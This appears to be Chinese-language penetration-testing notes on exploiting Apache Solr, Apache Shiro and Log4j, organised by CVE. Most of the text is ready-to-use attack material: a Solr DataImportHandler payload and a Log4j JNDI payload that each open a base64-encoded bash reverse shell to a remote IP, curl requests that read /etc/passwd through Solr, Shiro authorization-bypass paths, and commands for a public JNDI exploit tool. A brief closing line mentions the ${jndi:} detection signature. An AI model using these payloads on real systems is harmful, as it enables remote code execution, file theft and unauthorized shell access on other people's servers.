JAVA组件的利用漏洞 Shlr搜索引擎 shiro身份 Log4j日志
solr组件
1、作用 : 基于http和apache lucene 进行全文搜索服务器
2、识别:
第一个就是图标类似于华为的那个
然后就是端口标识是 8983
3、CVE利用:
1、命令执行(CVE-2019-17558)
Apache Solr 5.0.0版本至8.3.1
工具:https://github.com/jas502n/solr_rce
2、远程代码执行(条件很苛刻)
条件1:Apache Solr的DataImportHandler启用了模块DataImportHandler(默认不会被启用)
条件2:Solr Admin UI未开启鉴权认证。(默认情况无需任何认证)
UI鉴权就是我们不需要进行验证就能登录他的这个sorl后台 一般需要鉴权的如下
利用:
在点进 之后进入 debug模式输入
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(){ java.lang.Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}");
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>
这个现在还是比较少见的了
3、sorl SSRF和任意文件的读取
利用:
http://xxxxxx:8983/solr/admin/cores?indexInfo=false&wt=json
利用
curl -i -s -k 'http://47.94.236.117:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'
demo 是他的name
2、访问触发
curl -i -s -k -X $'POST' \
-H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \
$'http://47.94.236.117:8983/solr/demo/config'
3、任意文件读取
curl -i -s -k 'http://47.94.236.117:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'
Shiro
他的功能就是我们登录的时候点击一个记住我 下次就不用登陆了 这个就是他的功能
识别:
请求头 有个remmberME=1 
影响范围:Apache Shiro <= 1.2.4w
利用
1、反序列化造成的RCE
利用链:链就是
就是它已经加载的这个maven驱动或者是java自带的库
所以面试会问 有key无链怎么办? 1、爆破 2、就是利用java自带的库
授权绕过CVE-2020-11989
Apache Shiro < 1.7.1
本地部署
github上可以直接下载
https://github.com/jweny/shiro-cve-2020-17523
基本逻辑: 我们输入admin的时候会弹窗 就是因为他设置了一个 map authc
绕过:版本是在这个范围的
poc
3、CVE-2020-1957
利用:
/xxx/..;/admin/4、CVE-2022-32532
exp:
/permit/a%0anyLog4j
黑盒下很难识别 最简单的方式就是盲打
一般我们攻击这个组件就是使用JNDI 进行注入
先构造一个base64加密的反弹shell
bash -i >& /dev/tcp/192.168.21.17/5566>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxLjE3LzU1NjY+JjE=使用jndi工具进行生成一个反弹shell的注入
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxLjE3LzU1NjY+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.21.17
rmi:// 192.168.21.17:1099/zzmaai
靶场这里有个可控制的变量payload 把我们的exp进行url编码 :
${jndi:rmi://47.94.236.117:1099/osutj8}
执行成功
经过测试我们知道蓝队中jndi攻击的特征就是 ${jndi:} 这样的payload标识